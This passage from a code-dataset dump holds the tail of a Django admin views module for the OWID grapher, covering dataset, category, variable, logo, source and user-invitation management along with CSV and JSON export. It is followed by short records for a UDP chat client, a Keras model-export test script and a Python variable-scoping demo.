Dataset.objects.filter(pk=int(datasetid)).values()[0]\n except Dataset.DoesNotExist:\n return HttpResponseNotFound('Dataset does not exist!')\n\n sources_list = []\n sources = Source.objects.all().values('pk', 'name')\n for each in sources:\n sources_list.append({'id': int(each['pk']), 'name': each['name']})\n cats_list = []\n categories = DatasetCategory.objects.values('pk', 'name')\n for each in categories:\n cats_list.append({'id': int(each['pk']), 'name': each['name']})\n subcats_list = []\n subcategories = DatasetSubcategory.objects.values('pk', 'name')\n for each in subcategories:\n subcats_list.append({'id': int(each['pk']), 'name': each['name']})\n return render(request, 'admin.datasets.edit.html', context={'current_user': request.user.name,\n 'dataset': dataset,\n 'sources': sources_list,\n 'categories': cats_list,\n 'subcategories': subcats_list,\n })\n\n\ndef managedataset(request: HttpRequest, datasetid: str):\n try:\n dataset = Dataset.objects.filter(pk=int(datasetid))\n except Dataset.DoesNotExist:\n return HttpResponseNotFound('Dataset does not exist!')\n\n if request.method == 'POST':\n request_dict = QueryDict(request.body.decode('utf-8')).dict()\n if request_dict['_method'] == 'DELETE':\n try:\n dataset.delete()\n except Exception as e:\n if e.args[0] == 1451:\n messages.error(request, 'Dataset cannot be deleted while a chart still needs it. 
Delete charts or change their variables first.')\n return HttpResponseRedirect(reverse('showdataset', args=[datasetid]))\n else:\n messages.error(request, e.args[1])\n return HttpResponseRedirect(reverse('showdataset', args=[datasetid]))\n messages.success(request, 'Dataset deleted.')\n return HttpResponseRedirect(reverse('listdatasets'))\n if request_dict['_method'] == 'PATCH':\n request_dict.pop('_method', None)\n request_dict.pop('csrfmiddlewaretoken', None)\n request_dict['fk_dst_cat_id'] = DatasetCategory.objects.get(pk=request_dict['fk_dst_cat_id'])\n request_dict['fk_dst_subcat_id'] = DatasetSubcategory.objects.get(pk=request_dict['fk_dst_subcat_id'])\n Dataset.objects.filter(pk=datasetid).update(updated_at=timezone.now(), **request_dict)\n messages.success(request, 'Dataset updated!')\n return HttpResponseRedirect(reverse('showdataset', args=[datasetid]))\n\n if request.method == 'GET':\n return HttpResponseRedirect(reverse('showdataset', args=[datasetid]))\n\n\ndef dataset_csv(request: HttpRequest, datasetid: str):\n try:\n dataset = Dataset.objects.get(pk=int(datasetid))\n except Dataset.DoesNotExist:\n return HttpResponseNotFound('Dataset does not exist!')\n\n allvariables = Variable.objects.all()\n chartvarlist = []\n\n for var in allvariables:\n if var.fk_dst_id == dataset:\n chartvarlist.append({'id': var.pk, 'name': var.name})\n\n chartvarlist = sorted(chartvarlist, key=lambda k: k['id'])\n\n id_tuple = ''\n varlist = []\n headerlist = ['Entity', 'Year']\n\n for each in chartvarlist:\n id_tuple += str(each['id']) + ','\n headerlist.append(each['name'])\n varlist.append(each['id'])\n\n id_tuple = id_tuple[:-1]\n\n sql_query = 'SELECT `value`, `year`, data_values.`fk_var_id` as var_id, entities.id as entity_id, ' \\\n 'entities.name as entity_name from data_values ' \\\n 'join entities on data_values.`fk_ent_id` = entities.`id` WHERE ' \\\n 'data_values.`fk_var_id` in (%s) ORDER BY entity_name, year, fk_var_id;' % id_tuple\n\n with connection.cursor() as cursor:\n cursor.execute(sql_query)\n rows = cursor.fetchall()\n\n def stream():\n\n buffer_ = StringIO()\n writer = csv.writer(buffer_)\n writer.writerow(headerlist)\n current_row = None\n\n for row in rows:\n if not current_row or current_row[0] != row[4] or current_row[1] != row[1]:\n if current_row:\n writer.writerow(current_row)\n buffer_.seek(0)\n data = buffer_.read()\n buffer_.seek(0)\n buffer_.truncate()\n yield data\n\n current_row = [row[4], row[1]]\n for i in range(0, len(varlist)):\n current_row.append(\"\")\n\n theindex = 2 + varlist.index(row[2])\n current_row[theindex] = row[0]\n writer.writerow(current_row)\n buffer_.seek(0)\n data = buffer_.read()\n buffer_.seek(0)\n buffer_.truncate()\n yield data\n\n response = StreamingHttpResponse(\n stream(), content_type='text/csv'\n )\n ascii_filename = unidecode(dataset.name)\n disposition = \"attachment; filename='%s.csv'\" % ascii_filename\n response['Content-Disposition'] = disposition\n response['Cache-Control'] = 'public, max-age=0, s-maxage=604800'\n return response\n\n\ndef dataset_json(request: HttpRequest, datasetid: str):\n try:\n dataset = Dataset.objects.get(pk=int(datasetid))\n except Dataset.DoesNotExist:\n return HttpResponseNotFound('Dataset does not exist!')\n\n data = {'name': dataset.name, 'description': dataset.description, 'categoryId': dataset.fk_dst_cat_id.pk,\n 'subcategoryId': dataset.fk_dst_subcat_id.pk, 'variables': []}\n\n allchart_dimensions = ChartDimension.objects.all().values('chartId', 'variableId')\n var_to_chart = {}\n for each in 
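`dataset_csv` streams with a reusable `StringIO`: write one CSV row into the buffer, hand the buffer's contents to the response, truncate, repeat. The core of that idiom, reduced to a sketch:

import csv
from io import StringIO

def iter_csv(rows, header):
    buf = StringIO()
    writer = csv.writer(buf)
    for row in [header, *rows]:
        writer.writerow(row)
        yield buf.getvalue()   # hand the freshly written row to the caller
        buf.seek(0)
        buf.truncate()         # reset the buffer for the next row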
allchart_dimensions:\n if var_to_chart.get(each['variableId'], 0):\n var_to_chart[each['variableId']].append(each['chartId'])\n else:\n var_to_chart[each['variableId']] = []\n var_to_chart[each['variableId']].append(each['chartId'])\n\n allvariables = Variable.objects.all().select_related('sourceId')\n\n for var in allvariables:\n if var.fk_dst_id == dataset:\n\n sourcedata = {\n 'id': var.sourceId.pk,\n 'name': var.sourceId.name,\n 'description': var.sourceId.description\n }\n\n chartdata = []\n\n for onechart in var_to_chart.get(var.pk, []):\n chart = Chart.objects.get(pk=onechart)\n chartdata.append({\n 'id': chart.pk,\n 'name': chart.name\n })\n\n vardata = {\n 'id': var.pk,\n 'name': var.name,\n 'unit': var.unit,\n 'description': var.description,\n 'coverage': var.coverage,\n 'timespan': var.timespan,\n 'source': sourcedata,\n 'charts': chartdata\n }\n\n data['variables'].append(vardata)\n\n return JsonResponse(data, safe=False)\n\n\ndef check_invitation_statuses():\n invites = UserInvitation.objects.filter(status='pending')\n for each in invites:\n if each.valid_till <= timezone.now():\n each.status = 'expired'\n each.save()\n\n\ndef listcategories(request: HttpRequest):\n categories = DatasetCategory.objects.values()\n return render(request, 'admin.categories.html', context={'current_user': request.user.name,\n 'categories': categories\n })\n\n\ndef showcategory(request: HttpRequest, catid: str):\n try:\n category = DatasetCategory.objects.filter(pk=int(catid)).values()[0]\n catobj = DatasetCategory.objects.get(pk=int(catid))\n except DatasetCategory.DoesNotExist:\n return HttpResponseNotFound('Category does not exist!')\n\n subcategories = DatasetSubcategory.objects.filter(fk_dst_cat_id=catobj).values()\n\n category['subcategories'] = subcategories\n\n return render(request, 'admin.categories.show.html', context={'current_user': request.user.name,\n 'category': category\n })\n\n\ndef managecategory(request: HttpRequest, catid: str):\n try:\n category = DatasetCategory.objects.filter(pk=int(catid)).values()[0]\n except DatasetCategory.DoesNotExist:\n return HttpResponseNotFound('Category does not exist!')\n\n if request.method == 'POST':\n request_dict = QueryDict(request.body.decode('utf-8')).dict()\n if request_dict['_method'] == 'PATCH':\n request_dict.pop('_method', None)\n request_dict.pop('csrfmiddlewaretoken', None)\n DatasetCategory.objects.filter(pk=catid).update(updated_at=timezone.now(), **request_dict)\n messages.success(request, 'Category updated!')\n return HttpResponseRedirect(reverse('showcategory', args=[catid]))\n if request_dict['_method'] == 'DELETE':\n request_dict.pop('_method', None)\n request_dict.pop('csrfmiddlewaretoken', None)\n category = DatasetCategory.objects.get(pk=int(catid))\n subcategory = DatasetSubcategory.objects.filter(fk_dst_cat_id=category)\n try:\n for each in subcategory:\n each.delete()\n category.delete()\n except Exception as e:\n messages.error(request, e.args[1])\n return HttpResponseRedirect(reverse('editcategory', args=[catid]))\n messages.success(request, 'Category deleted!')\n return HttpResponseRedirect(reverse('listcategories'))\n\n\ndef editcategory(request: HttpRequest, catid: str):\n try:\n category = DatasetCategory.objects.filter(pk=int(catid)).values()[0]\n except DatasetCategory.DoesNotExist:\n return HttpResponseNotFound('Category does not exist!')\n\n return render(request, 'admin.categories.edit.html', context={'current_user': request.user.name,\n 'category': category\n })\n\n\ndef listvariables(request: HttpRequest):\n 
variables = Variable.objects.values()\n\n return render(request, 'admin.variables.html', context={'current_user': request.user.name,\n 'variables': variables\n })\n\n\ndef showvariable(request: HttpRequest, variableid: str):\n try:\n variable = Variable.objects.get(pk=int(variableid))\n except Variable.DoesNotExist:\n return HttpResponseNotFound('Variable does not exist!')\n\n items_per_page = 50\n\n chart_dims = list(ChartDimension.objects.filter(variableId=variable).values('chartId'))\n chart_id_list = []\n for each in chart_dims:\n chart_id_list.append(each['chartId'])\n charts = list(Chart.objects.filter(pk__in=chart_id_list).values('name', 'id'))\n\n variable_dict = {}\n variable_dict['name'] = variable.name\n variable_dict['id'] = variable.pk\n variable_dict['unit'] = variable.unit\n variable_dict['description'] = variable.description\n variable_dict['dataset'] = {'name': variable.fk_dst_id.name, 'id': variable.fk_dst_id.pk}\n variable_dict['source'] = {'name': variable.sourceId.name, 'id': variable.sourceId.pk}\n variable_dict['charts'] = charts\n\n request_dict = get_query_as_dict(request)\n if request_dict.get('search', [0])[0]:\n value_query = request_dict.get('value', [''])[0]\n year_query = request_dict.get('year', [None])[0]\n entity_query = request_dict.get('name', [''])[0]\n try:\n year_query = int(year_query)\n except ValueError:\n year_query = 0\n except TypeError:\n year_query = 0\n\n values = DataValue.objects.filter(fk_var_id=variable)\n if value_query:\n values = values.filter(value=value_query)\n if year_query:\n values = values.filter(year=year_query)\n if entity_query:\n values = values.filter(fk_ent_id__name=entity_query)\n\n else:\n values = DataValue.objects.filter(fk_var_id=variable)\n\n values = list(values.values('pk', 'value', 'year', 'fk_ent_id__name'))\n\n total_rows = len(values)\n total_pages = -(-len(values) // items_per_page)\n page_number = get_query_as_dict(request).get('page', [0])\n\n try:\n page_number = int(page_number[0])\n except ValueError:\n page_number = 0\n\n if page_number > 1:\n vals = values[(page_number - 1) * items_per_page:page_number * items_per_page]\n else:\n vals = values[:items_per_page]\n\n if vals:\n if total_pages >= 13:\n if page_number < 7:\n nav_pages = [1, 2, 3, 4, 5, 6, 7, 8, '#', total_pages - 1, total_pages]\n elif page_number > total_pages - 5:\n nav_pages = [1, 2, '#', total_pages - 7, total_pages - 6, total_pages - 5, total_pages - 4,\n total_pages - 3,\n total_pages - 2, total_pages - 1, total_pages]\n else:\n nav_pages = [1, 2, '#', page_number - 3, page_number - 2, page_number - 1, page_number,\n page_number + 1,\n page_number + 2, page_number + 3, '#', total_pages - 1, total_pages]\n else:\n nav_pages = [n for n in range(1, total_pages + 1)]\n else:\n nav_pages = []\n\n variable_dict['values'] = vals\n\n allentities = []\n for each in values:\n if each['fk_ent_id__name'] not in allentities:\n allentities.append(each['fk_ent_id__name'])\n\n request_string_for_pages = '?'\n for key, value in request_dict.items():\n if key != 'page':\n request_string_for_pages += key + '=' + value[0] + '&'\n\n return render(request, 'admin.variables.show.html', context={'current_user': request.user.name,\n 'variable': variable_dict,\n 'nav_pages': nav_pages,\n 'current_page': page_number,\n 'total_rows': total_rows,\n 'entities': allentities,\n 'page_request_string': request_string_for_pages\n })\n\n\ndef editvariable(request: HttpRequest, variableid: str):\n try:\n variable = Variable.objects.get(pk=int(variableid))\n except 
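`showvariable` above computes `total_pages` with `-(-len(values) // items_per_page)`, the sign-flip idiom for ceiling division that avoids importing `math`:

# -(-n // k) == ceil(n / k) for positive k
assert -(-101 // 50) == 3   # 101 rows at 50 per page -> 3 pages
assert -(-100 // 50) == 2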
Variable.DoesNotExist:\n return HttpResponseNotFound('Variable does not exist!')\n\n variable_dict = {\n 'name': variable.name,\n 'id': variable.pk,\n 'unit': variable.unit,\n 'coverage': variable.coverage,\n 'timespan': variable.timespan,\n 'description': variable.description,\n 'source': {'id': variable.sourceId.pk, 'name': variable.sourceId.name}\n }\n\n return render(request, 'admin.variables.edit.html', context={'current_user': request.user.name,\n 'variable': variable_dict\n })\n\n\ndef managevariable(request: HttpRequest, variableid: str):\n try:\n variable = Variable.objects.get(pk=int(variableid))\n except Variable.DoesNotExist:\n return HttpResponseNotFound('Variable does not exist!')\n\n if request.method == 'POST':\n request_dict = QueryDict(request.body.decode('utf-8')).dict()\n if request_dict['_method'] == 'DELETE':\n try:\n variable.delete()\n except Exception as e:\n messages.error(request, e.args[1])\n return HttpResponseRedirect(reverse('showvariable', args=[variableid]))\n messages.success(request, 'Variable deleted.')\n return HttpResponseRedirect(reverse('listvariables'))\n if request_dict['_method'] == 'PATCH':\n request_dict.pop('_method', None)\n request_dict.pop('csrfmiddlewaretoken', None)\n request_dict.pop('sourceId', None)\n Variable.objects.filter(pk=int(variableid)).update(updated_at=timezone.now(), **request_dict)\n messages.success(request, 'Variable updated!')\n return HttpResponseRedirect(reverse('showvariable', args=[variableid]))\n\n if request.method == 'GET':\n return HttpResponseRedirect(reverse('showvariable', args=[variableid]))\n\n\ndef listlicenses(request: HttpRequest):\n licenses = License.objects.values()\n return render(request, 'admin.licenses.html', context={'current_user': request.user.name,\n 'licenses': licenses\n })\n\n\ndef showlicense(request: HttpRequest, licenseid: str):\n try:\n license = License.objects.get(pk=int(licenseid))\n except License.DoesNotExist:\n return HttpResponseNotFound('License does not exist!')\n\n return render(request, 'admin.licenses.show.html', context={'current_user': request.user.name,\n 'license': license\n })\n\n\ndef editlicense(request: HttpRequest, licenseid: str):\n try:\n license = License.objects.get(pk=int(licenseid))\n except License.DoesNotExist:\n return HttpResponseNotFound('License does not exist!')\n\n license = {\n 'id': license.pk,\n 'name': license.name,\n 'description': license.description\n }\n\n return render(request, 'admin.licenses.edit.html', context={'current_user': request.user.name,\n 'license': license\n })\n\n\ndef managelicense(request: HttpRequest, licenseid: str):\n try:\n license = License.objects.get(pk=int(licenseid))\n except License.DoesNotExist:\n return HttpResponseNotFound('License does not exist!')\n\n if request.method == 'POST':\n request_dict = QueryDict(request.body.decode('utf-8')).dict()\n if request_dict['_method'] == 'PATCH':\n request_dict.pop('_method', None)\n request_dict.pop('csrfmiddlewaretoken', None)\n License.objects.filter(pk=int(licenseid)).update(updated_at=timezone.now(), **request_dict)\n messages.success(request, 'License updated!')\n return HttpResponseRedirect(reverse('showlicense', args=[licenseid]))\n\n if request.method == 'GET':\n return HttpResponseRedirect(reverse('showlicense', args=[licenseid]))\n\n\ndef listlogos(request: HttpRequest):\n logos = Logo.objects.values()\n return render(request, 'admin.logos.html', context={'current_user': request.user.name,\n 'logos': logos\n })\n\n\ndef createlogo(request: HttpRequest):\n return 
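Because HTML forms can only submit GET and POST, `managevariable`, `managelicense`, and the other manage* views tunnel the real verb through a `_method` field and branch on it. The shared skeleton, reduced to a sketch (not a helper the module defines):

def dispatch_override(request, on_patch, on_delete):
    data = QueryDict(request.body.decode('utf-8')).dict()
    verb = data.pop('_method', None)
    data.pop('csrfmiddlewaretoken', None)   # never forward the CSRF token
    if verb == 'DELETE':
        return on_delete()
    if verb == 'PATCH':
        return on_patch(data)               # remaining keys become field updates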
render(request, 'admin.logos.create.html', context={'current_user': request.user.name})\n\n\ndef storelogo(request: HttpRequest):\n\n if request.method == 'POST':\n if not request.POST.get('name', 0):\n messages.error(request, 'Name field should not be empty.')\n if not request.FILES.get('image', 0):\n messages.error(request, 'Image field should not be empty.')\n if messages.get_messages(request):\n return HttpResponseRedirect(reverse('createlogo'))\n svg = request.FILES['image'].read()\n logo = Logo(name=request.POST['name'], svg=svg)\n logo.save()\n messages.success(request, 'Logo created!')\n return HttpResponseRedirect(reverse('listlogos'))\n\n if request.method == 'GET':\n return HttpResponseRedirect(reverse('listlogos'))\n\n\ndef showlogo(request: HttpRequest, logoid: str):\n try:\n logo = Logo.objects.get(pk=int(logoid))\n except Logo.DoesNotExist:\n return HttpResponseNotFound('Logo does not exist!')\n\n logo = {\n 'id': logo.pk,\n 'name': logo.name,\n 'svg': logo.svg\n }\n\n return render(request, 'admin.logos.show.html', context={'current_user': request.user.name,\n 'logo': logo})\n\n\ndef editlogo(request: HttpRequest, logoid: str):\n try:\n logo = Logo.objects.get(pk=int(logoid))\n except Logo.DoesNotExist:\n return HttpResponseNotFound('Logo does not exist!')\n\n logo = {\n 'id': logo.pk,\n 'name': logo.name\n }\n\n return render(request, 'admin.logos.edit.html', context={'current_user': request.user.name,\n 'logo': logo})\n\n\ndef managelogo(request: HttpRequest, logoid: str):\n try:\n logo = Logo.objects.get(pk=int(logoid))\n except Logo.DoesNotExist:\n return HttpResponseNotFound('Logo does not exist!')\n\n if request.method == 'POST':\n if request.POST.get('_method', '') == 'PATCH':\n image_no_change = 0\n if not request.POST.get('name', 0):\n messages.error(request, 'Name field should not be empty.')\n if not request.FILES.get('image', 0):\n image_no_change = 1\n if messages.get_messages(request):\n return HttpResponseRedirect(reverse('editlogo', args=[logoid]))\n if not image_no_change:\n svg = request.FILES['image'].read()\n logo.name = request.POST['name']\n logo.svg = svg\n else:\n logo.name = request.POST['name']\n logo.save()\n messages.success(request, 'Logo updated!')\n return HttpResponseRedirect(reverse('showlogo', args=[logoid]))\n if request.POST.get('_method', '') == 'DELETE':\n logo.delete()\n messages.success(request, 'Logo deleted!')\n return HttpResponseRedirect(reverse('listlogos'))\n\n if request.method == 'GET':\n return HttpResponseRedirect(reverse('showlogo', args=[logoid]))\n\n\ndef listsources(request: HttpRequest):\n\n datasets = Dataset.objects.all()\n variables = Variable.objects.all()\n sources = Source.objects.all().order_by('name')\n\n source_var_dict: Dict = {}\n dataset_dict: Dict = {}\n\n for each in datasets:\n dataset_dict[each.pk] = {'id': each.pk, 'name': each.name}\n\n for each in variables:\n if not source_var_dict.get(each.sourceId.pk, 0):\n source_var_dict[each.sourceId.pk] = []\n source_var_dict[each.sourceId.pk].append({\n 'id': each.pk,\n 'name': each.name\n })\n else:\n source_var_dict[each.sourceId.pk].append({\n 'id': each.pk,\n 'name': each.name\n })\n\n sources_list = []\n\n for each in sources:\n sources_list.append({'id': each.pk, 'name': each.name,\n 'dataset': dataset_dict.get(each.datasetId, None),\n 'variables': source_var_dict.get(each.pk, [])})\n\n return render(request, 'admin.sources.html', context={'current_user': request.user.name,\n 'sources': sources_list})\n\n\ndef showsource(request: HttpRequest, sourceid: 
str):\n try:\n source = Source.objects.get(pk=int(sourceid))\n except Source.DoesNotExist:\n return HttpResponseNotFound('Source does not exist!')\n\n source = {'id': source.pk, 'name': source.name, 'description': source.description}\n\n try:\n dataset = Dataset.objects.get(pk=source['id'])\n source['dataset'] = {'id': dataset.pk, 'name': dataset.name}\n except:\n source['dataset'] = None\n\n variables = Variable.objects.filter(sourceId__pk=source['id']).values()\n\n source['variables'] = variables\n\n return render(request, 'admin.sources.show.html', context={'current_user': request.user.name,\n 'source': source})\n\n\ndef editsource(request: HttpRequest, sourceid: str):\n try:\n source = Source.objects.get(pk=int(sourceid))\n except Source.DoesNotExist:\n return HttpResponseNotFound('Source does not exist!')\n\n source = {\n 'id': source.pk,\n 'name': source.name,\n 'description': source.description\n }\n\n return render(request, 'admin.sources.edit.html', context={'current_user': request.user.name,\n 'source': source})\n\n\ndef managesource(request: HttpRequest, sourceid: str):\n try:\n source = Source.objects.get(pk=int(sourceid))\n except Source.DoesNotExist:\n return HttpResponseNotFound('Source does not exist!')\n\n if request.method == 'POST':\n request_dict = QueryDict(request.body.decode('utf-8')).dict()\n if request_dict['_method'] == 'PATCH':\n request_dict.pop('_method', None)\n request_dict.pop('csrfmiddlewaretoken', None)\n try:\n Source.objects.filter(pk=int(sourceid)).update(updated_at=timezone.now(), **request_dict)\n except Exception as e:\n messages.error(request, e.args[1])\n return HttpResponseRedirect(reverse('showsource', args=[sourceid]))\n messages.success(request, 'Source updated!')\n return HttpResponseRedirect(reverse('showsource', args=[sourceid]))\n\n if request.method == 'GET':\n return HttpResponseRedirect(reverse('showsource', args=[sourceid]))\n\n\ndef editsourcetemplate(request: HttpRequest):\n sourcetemplate = Setting.objects.filter(meta_name='sourceTemplate').first()\n\n if request.method == 'GET':\n\n sourcetemplate = {'meta_value': sourcetemplate.meta_value}\n\n return render(request, 'admin.sourcetemplate.edit.html', context={'current_user': request.user.name,\n 'sourcetemplate': sourcetemplate})\n if request.method == 'POST':\n if not request.POST.get('source_template', 0):\n messages.error(request, 'Source template field should not be empty.')\n return render(request, 'admin.sourcetemplate.edit.html', context={'current_user': request.user.name,\n 'sourcetemplate': sourcetemplate})\n else:\n sourcetemplate.meta_value = request.POST['source_template']\n sourcetemplate.save()\n messages.success(request, 'Source template updated.')\n return render(request, 'admin.sourcetemplate.edit.html', context={'current_user': request.user.name,\n 'sourcetemplate': sourcetemplate})\n\n\ndef editsubcategory(request: HttpRequest, subcatid: str):\n try:\n subcat = DatasetSubcategory.objects.get(pk=int(subcatid))\n except DatasetSubcategory.DoesNotExist:\n return HttpResponseNotFound('Subcategory does not exist!')\n\n subcategory = {'id': subcat.pk, 'name': subcat.name, 'category': subcat.fk_dst_cat_id.pk}\n categories = DatasetCategory.objects.values()\n category = {'id': subcat.fk_dst_cat_id.pk}\n\n return render(request, 'admin.subcategories.edit.html', context={'current_user': request.user.name,\n 'subcategory': subcategory,\n 'categories': categories,\n 'category': category})\n\n\ndef managesubcategory(request: HttpRequest, subcatid: str):\n try:\n subcat = 
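In `showsource` above, the dataset lookup is `Dataset.objects.get(pk=source['id'])`, i.e. it reuses the source's own primary key as the dataset key, and the bare `except:` silently converts the mismatch into `dataset = None`. Given that `listsources` reads `each.datasetId` off the `Source` model, the probable intent is (sketch; `src` stands for the Source instance before the code rebinds `source` to a dict):

try:
    dataset = Dataset.objects.get(pk=src.datasetId)
    source['dataset'] = {'id': dataset.pk, 'name': dataset.name}
except Dataset.DoesNotExist:   # also narrows the bare except
    source['dataset'] = None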
DatasetSubcategory.objects.get(pk=int(subcatid))\n except DatasetSubcategory.DoesNotExist:\n return HttpResponseNotFound('Subcategory does not exist!')\n\n parent_cat = subcat.fk_dst_cat_id.pk\n\n if request.method == 'POST':\n request_dict = QueryDict(request.body.decode('utf-8')).dict()\n if request_dict['_method'] == 'DELETE':\n try:\n subcat.delete()\n except Exception as e:\n messages.error(request, e.args[1])\n return HttpResponseRedirect(reverse('editsubcategory', args=[subcatid]))\n messages.success(request, 'Subcategory deleted.')\n return HttpResponseRedirect(reverse('showcategory', args=[parent_cat]))\n if request_dict['_method'] == 'PATCH':\n request_dict.pop('_method', None)\n request_dict.pop('csrfmiddlewaretoken', None)\n try:\n DatasetSubcategory.objects.filter(pk=int(subcatid)).update(updated_at=timezone.now(), **request_dict)\n except Exception as e:\n messages.error(request, e.args[1])\n return HttpResponseRedirect(reverse('editsubcategory', args=[subcatid]))\n messages.success(request, 'Subcategory updated!')\n return HttpResponseRedirect(reverse('showcategory', args=[parent_cat]))\n\n\ndef createsubcategory(request: HttpRequest):\n categories = DatasetCategory.objects.values()\n return render(request, 'admin.subcategories.create.html',context={'current_user': request.user.name,\n 'categories': categories\n })\n\n\ndef storesubcategory(request: HttpRequest):\n categories = DatasetCategory.objects.values()\n if request.method == 'POST':\n if not request.POST.get('name', 0):\n messages.error(request, 'Name field should not be empty.')\n if messages.get_messages(request):\n return render(request, 'admin.subcategories.create.html',\n context={'current_user': request.user.name,\n 'categories': categories})\n subcat = DatasetSubcategory()\n subcat.name = request.POST['name']\n subcat.fk_dst_cat_id = DatasetCategory.objects.get(pk=int(request.POST['fk_dst_cat_id']))\n subcat.save()\n messages.success(request, 'Subcategory created!')\n return HttpResponseRedirect(reverse('listcategories'))\n\n\ndef listusers(request: HttpRequest):\n check_invitation_statuses()\n users = User.objects.all().order_by('created_at')\n userlist = []\n\n for each in users:\n userlist.append({'name': each.name, 'created_at': each.created_at})\n\n if '.json' in urlparse(request.get_full_path()).path:\n return JsonResponse(userlist, safe=False)\n else:\n return render(request, 'admin.users.html', context={'current_user': request.user.name,\n 'users': userlist\n })\n\n\ndef invite_user(request: HttpRequest):\n if request.method == 'GET':\n if not request.user.is_superuser:\n return HttpResponse('Permission denied!')\n else:\n form = InviteUserForm()\n return render(request, 'admin.invite_user.html', context={'form': form,\n 'current_user': request.user.name})\n if request.method == 'POST':\n if not request.user.is_superuser:\n return HttpResponse('Permission denied!')\n else:\n form = InviteUserForm(request.POST)\n if form.is_valid():\n email = form.cleaned_data['email']\n name = form.cleaned_data['name']\n try:\n newuser = User.objects.get(email=email)\n messages.error(request, 'The user you are inviting is registered in the system.')\n return render(request, 'admin.invite_user.html', context={'form': form,\n 'current_user': request.user.name})\n except User.DoesNotExist:\n pass\n try:\n newuser = User.objects.get(name=name)\n messages.error(request, 'The user with that name is registered in the system.')\n return render(request, 'admin.invite_user.html', context={'form': form,\n 'current_user': 
request.user.name})\n except User.DoesNotExist:\n pass\n newuser = User()\n newuser.email = email\n newuser.name = name\n newuser.is_active = False\n newuser.is_superuser = False\n newuser.save()\n invitation = UserInvitation()\n invitation.code = get_random_string(length=40)\n invitation.email = newuser.email\n invitation.user_id = newuser\n invitation.status = 'pending'\n invitation.valid_till = timezone.now() + datetime.timedelta(days=2)\n invitation.save()\n newuser.email_user('Invitation to join OWID',\n 'Hi %s, please follow this link in order '\n 'to register on owid-grapher: %s' %\n (newuser.name, request.build_absolute_uri(reverse('registerbyinvite', args=[invitation.code]))),\n 'no-reply@ourworldindata.org')\n messages.success(request, 'The invite was sent successfully.')\n return render(request, 'admin.invite_user.html', context={'form': InviteUserForm(),\n 'current_user': request.user.name, })\n else:\n return render(request, 'admin.invite_user.html', context={'form': form,\n 'current_user': request.user.name, })\n\n\ndef register_by_invite(request: HttpRequest, code: str):\n check_invitation_statuses()\n try:\n invite = UserInvitation.objects.get(code=code)\n except UserInvitation.DoesNotExist:\n return HttpResponseNotFound('Your invitation code does not exist in the system.')\n invited_user = invite.user_id\n\n if request.method == 'GET':\n if invite.status == 'successful':\n return HttpResponse('Your invitation code has already been used.')\n if invite.status == 'expired':\n return HttpResponse('Your invitation code has expired.')\n if invite.status == 'cancelled':\n return HttpResponse('Your invitation code has been cancelled.')\n form = InvitedUserRegisterForm(data={'name': invited_user.name})\n return render(request, 'register_invited_user.html', context={'form': form})\n if request.method == 'POST':\n form = InvitedUserRegisterForm(request.POST)\n if form.is_valid():\n name = form.cleaned_data['name']\n try:\n newuser = User.objects.get(name=name)\n if newuser != invited_user:\n messages.error(request, 'The username you chose is not available. 
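`check_invitation_statuses` (called from `listusers` and `register_by_invite`) walks every pending invitation and saves the expired ones one at a time. The same sweep is a single UPDATE (sketch, using the fields the model demonstrably has):

UserInvitation.objects.filter(
    status='pending',
    valid_till__lte=timezone.now(),
).update(status='expired')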
Please choose another username.')\n                    return render(request, 'register_invited_user.html', context={'form': form})\n            except User.DoesNotExist:\n                pass\n            if form.cleaned_data['password1'] == form.cleaned_data['password2']:\n                # update the invited user record; 'newuser' is unbound when the chosen name is free\n                invited_user.name = name\n                invited_user.set_password(form.cleaned_data['password1'])\n                invited_user.is_active = True\n                invited_user.save()\n                invite.status = 'successful'\n                invite.save()\n                return HttpResponseRedirect(reverse(\"login\"))\n            else:\n                messages.error(request, \"Passwords don't match!\")\n                return render(request, 'register_invited_user.html', context={'form': form})\n        else:\n            return render(request, 'register_invited_user.html', context={'form': form})\n","sub_path":"grapher_admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":60781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"593928984","text":"import socket\n\nsk = socket.socket(type=socket.SOCK_DGRAM)\nip_port = ('127.0.0.1', 8080)\n\nwhile True:\n    info = input('Brother says: ')\n    # encode once, only when sending; encoding at input() embedded a bytes repr in the message\n    info = '\\033[34mMessage from brother: %s\\033[0m' % info\n    sk.sendto(info.encode('utf-8'), ip_port)\n    msg, addr = sk.recvfrom(1024)\n    print(msg.decode('utf-8'))\nsk.close()","sub_path":"day31/demo3_udpqq/client2.py","file_name":"client2.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"131184267","text":"'''\nCreate a simple ConvNet for testing Keras model import. Run\nKeras mnist_cnn.py example and then save that model and its\noutputs to disk.\n'''\nfrom __future__ import print_function\n\nimport imp\nimport keras.backend as K\nfrom util import save_model_details, save_model_output\n\nSCRIPT_PATH = '../examples/mnist_cnn.py'\nKERAS_VERSION = '_keras_2'\nPREFIX = 'mnist_cnn_' + K.image_dim_ordering() + KERAS_VERSION\nOUT_DIR = '.'\n\nprint('Entering Keras script')\nexample = imp.load_source('example', SCRIPT_PATH)\n\nprint('Saving model details')\nsave_model_details(example.model, prefix=PREFIX, out_dir=OUT_DIR)\n\nprint('Saving model outputs')\nsave_model_output(example.model, example.X_test, example.Y_test, nb_examples=100, prefix=PREFIX, out_dir=OUT_DIR)\n\nprint('DONE!')\n","sub_path":"keras-tests/make_mnist_cnn_unit_test.py","file_name":"make_mnist_cnn_unit_test.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"53446658","text":"myglobalvar = 'global hello'\n\n\ndef variable_test():\n    # Variable creation, must be initialized with value\n    myvar = None\n    print('myvar=%s' % myvar)\n\n    # Variable can be deleted\n    del myvar\n    try:\n        print('myvar=%s' % myvar)\n    except NameError:\n        print('myvar is no longer defined')\n\n\ndef global_variable_test1():\n    print('global var can be read:', myglobalvar)\n\n\ndef global_variable_test2():\n    global myglobalvar\n    myglobalvar = 'updated global hello'\n    print('global var can be changed:', myglobalvar)\n\n\ndef global_variable_test3():\n    try:\n        # Global var must be re-declared with global keyword in function before updating value, otherwise a new local\n        # var is created, and previous reference will result in exception\n        print('myglobalvar=%s' % myglobalvar)\n        myglobalvar = 'updated global hello'\n    except UnboundLocalError as e:\n        print('Error trying to set globalvar:', 
